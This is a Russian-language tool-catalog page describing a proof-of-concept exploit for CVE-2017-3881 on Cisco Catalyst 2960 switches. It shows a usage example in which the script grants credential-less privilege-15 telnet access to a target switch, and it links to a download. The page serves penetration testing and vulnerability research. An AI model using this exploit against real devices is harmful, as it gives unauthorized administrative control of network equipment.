Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PoC-CVE-2017-3881 — Cisco Catalyst Remote Code Execution PoC | Kitploit
Инструменты/GitHubGitHub/mzakyz666/poc-cve-2017-3881
Безопасность встроенных системФреймворки для эксплойтовАнализ уязвимостейЭксплуатацияСетевая безопасностьТестирование на Проникновение
GitHubmzakyz666/poc-cve-2017-3881

PoC-CVE-2017-3881

Cisco Catalyst Remote Code Execution PoC

Репозиторий
1219 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PoC-CVE-2017-3881

Cisco Catalyst — PoC удаленного выполнения кода

Этот репозиторий содержит код Proof-Of-Concept для эксплуатации уязвимости удаленного выполнения кода, раскрытой Cisco Systems 17 марта 2017 года — https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp

Описание

Статья об эксплойте: https://errorcybernews.com/2017/05/11/cisco-systems-merilis-update-switch/

Код эксплойта RCE доступен для модели коммутатора Cisco Catalyst 2960. Этот эксплойт зависит от прошивки. Поддерживаются две версии прошивки:

  • 12.2(55)SE1 C2960-LANBASEK9-M

  • 12.2(55)SE11 C2960-LANBASEK9-M

Код отказа в обслуживании (DoS) доступен в виде модуля metasploit на Ruby. Он должен работать для большинства коммутаторов, упомянутых в уведомлении Cisco (требуется подтверждение).

Пример использования

root@kitploit:~
$ python c2960-lanbasek9-m-12.2.55.se11 192.168.88.10 --set
[+] Connection OK
[+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f'
[+] Sending cluster option
[+] Setting credless privilege 15 authentication
[+] All done
$ telnet 192.168.88.10
Trying 192.168.88.10...
Connected to 192.168.88.10.
Escape character is '^]'.

catalyst1#show priv
Current privilege level is 15

Благодарности автору:

Artem Kondratenko https://twitter.com/artkond

Скачать инструмент